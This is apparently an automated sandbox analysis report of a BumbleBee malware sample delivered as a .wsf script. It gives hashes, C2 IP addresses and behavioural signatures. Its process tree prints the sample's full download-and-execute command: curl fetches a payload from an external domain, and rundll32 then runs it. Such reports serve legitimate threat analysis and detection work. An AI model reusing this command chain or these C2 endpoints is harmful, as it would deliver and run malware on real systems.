Resubmissions

26-04-2023 15:07

230426-shf2xaca2v 10

20-04-2023 19:33

230420-x9zqjsbh82 10

Analysis

  • max time kernel
    144s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-04-2023 19:33

General

  • Target

    doc_88BFNS_57.wsf

  • Size

    192KB

  • MD5

    d6d0f8cf0b9383802fd4868c2082017d

  • SHA1

    16b03efbf2aa547ca308ae50d8673012844c52b9

  • SHA256

    f6ff607f55b6c53b700e3c1a8a4230c01641111bfc09645ba54c75ca2b1587cd

  • SHA512

    0e331aeef702394d3b04939f0755bdbbc79ac24e23cbf54fad51645da045b598ee4077ba629af1a5f1e833b062f92acd033fd718c41dedb27b5041199f449efb

  • SSDEEP

    6144:rPYy39mm2+oVmcySJnfzKe1ZFmqRzgim/Ytix:TYy3Cdtn1Hw

Score
10/10

Malware Config

Extracted

Family

bumblebee

Botnet

mc1904

C2

146.70.155.82:443

149.3.170.179:443

103.175.16.150:443

rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a webshell malware written in C++.

  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc_88BFNS_57.wsf"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/DiqLyFvy2N0LYrttmJnMIAadyzDl_bYhxQ~~/QdaQp4v9soc3yoFDOCHH_cpZg_ECJjHlNg~~/ --output nmohzblo.obh && if exist nmohzblo.obh rundll32 nmohzblo.obh,bYXjdERymsFY && del nmohzblo.obh
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3244
      • C:\Windows\system32\curl.exe
        curl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/DiqLyFvy2N0LYrttmJnMIAadyzDl_bYhxQ~~/QdaQp4v9soc3yoFDOCHH_cpZg_ECJjHlNg~~/ --output nmohzblo.obh
        3⤵
          PID:544
        • C:\Windows\system32\rundll32.exe
          rundll32 nmohzblo.obh,bYXjdERymsFY
          3⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious use of NtCreateThreadExHideFromDebugger
          PID:3724

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\nmohzblo.obh

      Filesize

      1.4MB

      MD5

      adcfd6939319c09ad8cbef72a81944a5

      SHA1

      154c1f4bc247d79789ec7eaf0feb92ea0d932445

      SHA256

      d763681286d9d514420c27210746edd5bb9b563b626c0cdb2c61239292b86535

      SHA512

      4f4fb6e9d2c833d4335dc816fbac2b5d25d3b95fdd1dced1b795c5564d367dca533eb743842fcf31ae74563cba451ae55b226e44f05b4745613b8e6e50e010ce

    • C:\Users\Admin\AppData\Local\Temp\nmohzblo.obh

      Filesize

      1.4MB

      MD5

      adcfd6939319c09ad8cbef72a81944a5

      SHA1

      154c1f4bc247d79789ec7eaf0feb92ea0d932445

      SHA256

      d763681286d9d514420c27210746edd5bb9b563b626c0cdb2c61239292b86535

      SHA512

      4f4fb6e9d2c833d4335dc816fbac2b5d25d3b95fdd1dced1b795c5564d367dca533eb743842fcf31ae74563cba451ae55b226e44f05b4745613b8e6e50e010ce

    • memory/3724-136-0x000002090B420000-0x000002090B581000-memory.dmp

      Filesize

      1.4MB

    • memory/3724-137-0x000002090B420000-0x000002090B581000-memory.dmp

      Filesize

      1.4MB

    • memory/3724-138-0x000002090B420000-0x000002090B581000-memory.dmp

      Filesize

      1.4MB

    • memory/3724-139-0x0000020909930000-0x00000209099AA000-memory.dmp

      Filesize

      488KB